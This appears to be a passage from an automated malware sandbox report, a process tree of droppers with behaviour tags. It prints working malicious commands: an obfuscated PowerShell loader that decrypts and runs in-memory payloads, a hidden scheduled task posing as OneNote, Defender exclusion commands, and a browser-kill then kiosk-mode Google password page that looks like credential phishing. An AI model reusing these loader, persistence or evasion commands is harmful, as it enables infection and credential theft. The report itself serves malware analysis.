        11⤵
        System Location Discovery: System Language Discovery
        
        PID:2744
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 5846' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network5846Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        11⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:6140
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network5846Man.cmd"
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:5708
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network5846Man.cmd"
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:4804
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network5846Man.cmd';$nPrC='LoGoteadGote'.Replace('Gote', ''),'FITAkrITAkomBITAkaITAksITAke6ITAk4SITAktrITAkingITAk'.Replace('ITAk', ''),'EwCHintwCHirwCHiywCHiPwCHioiwCHintwCHi'.Replace('wCHi', ''),'SpePUtlitePUt'.Replace('ePUt', ''),'DecYisdompYisdrYisdeYisdsYisdsYisd'.Replace('Yisd', ''),'TsNkHrasNkHnssNkHfosNkHrsNkHmFsNkHinsNkHalsNkHBlosNkHcsNkHksNkH'.Replace('sNkH', ''),'CrfXbxeatfXbxeDfXbxecrfXbxypfXbxtfXbxorfXbx'.Replace('fXbx', ''),'MMLdxaMLdxinMLdxMoMLdxduMLdxleMLdx'.Replace('MLdx', ''),'ElIeKReIeKRmIeKReIeKRnIeKRtAIeKRtIeKR'.Replace('IeKR', ''),'InHUKcvHUKcokHUKceHUKc'.Replace('HUKc', ''),'ReazMwFdLzMwFizMwFneszMwF'.Replace('zMwF', ''),'ChaJonanaJongeEaJonxtaJonenaJonsaJoniaJonoaJonnaJon'.Replace('aJon', ''),'GepcketpckeCpckeurpckerepckentPpckerocpckeepckesspcke'.Replace('pcke', ''),'CQogZopQogZyTQogZoQogZ'.Replace('QogZ', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($nPrC[12])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kMdJS($RQSTg){$zmvMN=[System.Security.Cryptography.Aes]::Create();$zmvMN.Mode=[System.Security.Cryptography.CipherMode]::CBC;$zmvMN.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$zmvMN.Key=[System.Convert]::($nPrC[1])('ML5/q9cXAh8zwmdF4WccY8ENAkFEsjrEy+dUpWTmk7k=');$zmvMN.IV=[System.Convert]::($nPrC[1])('zFU4xrxhUym0St+7yBu7eA==');$pWysh=$zmvMN.($nPrC[6])();$OefOm=$pWysh.($nPrC[5])($RQSTg,0,$RQSTg.Length);$pWysh.Dispose();$zmvMN.Dispose();$OefOm;}function PFVVL($RQSTg){$eAKke=New-Object System.IO.MemoryStream(,$RQSTg);$LAgIa=New-Object System.IO.MemoryStream;$nDRnz=New-Object System.IO.Compression.GZipStream($eAKke,[IO.Compression.CompressionMode]::($nPrC[4]));$nDRnz.($nPrC[13])($LAgIa);$nDRnz.Dispose();$eAKke.Dispose();$LAgIa.Dispose();$LAgIa.ToArray();}$LXMkx=[System.IO.File]::($nPrC[10])([Console]::Title);$NXZhU=PFVVL (kMdJS ([Convert]::($nPrC[1])([System.Linq.Enumerable]::($nPrC[8])($LXMkx, 5).Substring(2))));$MPjpB=PFVVL (kMdJS ([Convert]::($nPrC[1])([System.Linq.Enumerable]::($nPrC[8])($LXMkx, 6).Substring(2))));[System.Reflection.Assembly]::($nPrC[0])([byte[]]$MPjpB).($nPrC[2]).($nPrC[9])($null,$null);[System.Reflection.Assembly]::($nPrC[0])([byte[]]$NXZhU).($nPrC[2]).($nPrC[9])($null,$null); "
        13⤵
        System Location Discovery: System Language Discovery
        
        PID:2952
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        13⤵
        System Location Discovery: System Language Discovery
        
        PID:1140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        14⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:4020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        14⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:5748
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network5846Man')
        14⤵
        System Location Discovery: System Language Discovery
        
        PID:3524
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 5846' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network5846Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        14⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:5640
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1140 -s 2512
        14⤵
        Program crash
        
        PID:316
  - - C:\Users\Admin\AppData\Local\Temp\1011445001\rhnew.exe
      "C:\Users\Admin\AppData\Local\Temp\1011445001\rhnew.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4080
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 536
        5⤵
        Program crash
        
        PID:3876
  - - C:\Users\Admin\AppData\Local\Temp\1011459001\dee7fa7ddf.exe
      "C:\Users\Admin\AppData\Local\Temp\1011459001\dee7fa7ddf.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4716
    - - C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
        
        "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:792
      - C:\Users\Admin\AppData\Local\Temp\1005114001\663bb1178a.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1005114001\663bb1178a.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:1660
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:3800
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffcd5c2cc40,0x7ffcd5c2cc4c,0x7ffcd5c2cc58
        8⤵
        
        PID:4000
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1888,i,12789901111244859665,17449267893684059362,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1884 /prefetch:2
        8⤵
        
        PID:812
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2136,i,12789901111244859665,17449267893684059362,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2144 /prefetch:3
        8⤵
        
        PID:2920
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2212,i,12789901111244859665,17449267893684059362,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2608 /prefetch:8
        8⤵
        
        PID:4472
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3092,i,12789901111244859665,17449267893684059362,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3172 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:2040
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3100,i,12789901111244859665,17449267893684059362,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1268
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4552,i,12789901111244859665,17449267893684059362,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4584 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:4704
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4792,i,12789901111244859665,17449267893684059362,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4800 /prefetch:8
        8⤵
        
        PID:5656
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4484,i,12789901111244859665,17449267893684059362,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4952 /prefetch:8
        8⤵
        
        PID:5716
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:4784
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xe4,0x108,0x7ffcd5c346f8,0x7ffcd5c34708,0x7ffcd5c34718
        8⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:4820
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,10447772114896797207,2787570481605510695,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2000 /prefetch:2
        8⤵
        
        PID:5240
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1988,10447772114896797207,2787570481605510695,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 /prefetch:3
        8⤵
        
        PID:5248
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1988,10447772114896797207,2787570481605510695,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:8
        8⤵
        
        PID:5404
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1988,10447772114896797207,2787570481605510695,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5464
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1988,10447772114896797207,2787570481605510695,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5684
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1988,10447772114896797207,2787570481605510695,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1896
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1988,10447772114896797207,2787570481605510695,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:612
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\Documents\AEGHCFIDAK.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4280
        
        C:\Users\Admin\Documents\AEGHCFIDAK.exe
        
        "C:\Users\Admin\Documents\AEGHCFIDAK.exe"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:5100
      - C:\Users\Admin\AppData\Local\Temp\1005115001\3a27476f99.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1005115001\3a27476f99.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:1180
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 1540
        7⤵
        Program crash
        
        PID:5908
  - - C:\Users\Admin\AppData\Local\Temp\1011475001\663bb1178a.exe
      "C:\Users\Admin\AppData\Local\Temp\1011475001\663bb1178a.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      PID:1476
  - - C:\Users\Admin\AppData\Local\Temp\1011476001\790db7793c.exe
      "C:\Users\Admin\AppData\Local\Temp\1011476001\790db7793c.exe"
      4⤵
      Enumerates VirtualBox registry keys
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      PID:5452
  - - C:\Users\Admin\AppData\Local\Temp\1011477001\01c06f74eb.exe
      "C:\Users\Admin\AppData\Local\Temp\1011477001\01c06f74eb.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      PID:5228
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5228 -s 1556
        5⤵
        Program crash
        
        PID:1116
  - - C:\Users\Admin\AppData\Local\Temp\1011478001\6293d779b0.exe
      "C:\Users\Admin\AppData\Local\Temp\1011478001\6293d779b0.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      PID:4116
  - - C:\Users\Admin\AppData\Local\Temp\1011479001\94bcd22a0e.exe
      "C:\Users\Admin\AppData\Local\Temp\1011479001\94bcd22a0e.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:2980
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:5268
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:2024
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:2876
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:4292
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:5100
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        5⤵
        
        PID:6020
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        6⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:4400
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1940 -prefMapHandle 1932 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e31d302-18c5-42e8-affa-cd0304f54fca} 4400 "\\.\pipe\gecko-crash-server-pipe.4400" gpu
        7⤵
        
        PID:2892
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2444 -prefMapHandle 2440 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {81d15451-ab02-4c5c-856c-7cad1a81a41b} 4400 "\\.\pipe\gecko-crash-server-pipe.4400" socket
        7⤵
        
        PID:4720
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3120 -childID 1 -isForBrowser -prefsHandle 3112 -prefMapHandle 3108 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee58f039-37dd-4ceb-8957-60c18acd4263} 4400 "\\.\pipe\gecko-crash-server-pipe.4400" tab
        7⤵
        
        PID:1496
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3940 -childID 2 -isForBrowser -prefsHandle 3932 -prefMapHandle 3928 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {88c15f98-201d-4112-8a56-d11aeda7ead2} 4400 "\\.\pipe\gecko-crash-server-pipe.4400" tab
        7⤵
        
        PID:5844
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4792 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4780 -prefMapHandle 4716 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {046ee3ff-b72a-457f-9d49-bfccb8e1028d} 4400 "\\.\pipe\gecko-crash-server-pipe.4400" utility
        7⤵
        Checks processor information in registry
        
        PID:5988
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5372 -childID 3 -isForBrowser -prefsHandle 5364 -prefMapHandle 5324 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b8796194-df4d-477b-b83c-700087859228} 4400 "\\.\pipe\gecko-crash-server-pipe.4400" tab
        7⤵
        
        PID:5412
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5500 -childID 4 -isForBrowser -prefsHandle 5508 -prefMapHandle 5512 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b550a59-5a7c-41a6-b5c8-e9f57275f47d} 4400 "\\.\pipe\gecko-crash-server-pipe.4400" tab
        7⤵
        
        PID:4432
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5692 -childID 5 -isForBrowser -prefsHandle 5700 -prefMapHandle 5704 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {daace86d-ed03-4ccf-8dbe-2f1e5ce56159} 4400 "\\.\pipe\gecko-crash-server-pipe.4400" tab
        7⤵
        
        PID:3628
  - - C:\Users\Admin\AppData\Local\Temp\1011480001\d99938247d.exe
      "C:\Users\Admin\AppData\Local\Temp\1011480001\d99938247d.exe"
      4⤵
      Modifies Windows Defender Real-time Protection settings
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Windows security modification
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      PID:1868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4896

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:5108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:4844

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:228

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:2864

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:1916
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4080 -ip 4080
  2⤵
  PID:3452
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1180 -ip 1180
  2⤵
  PID:5784
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5228 -ip 5228
  2⤵
  PID:1868
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1140 -ip 1140
  2⤵
  PID:5760

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4692

C:\Windows\system32\svchost.exe
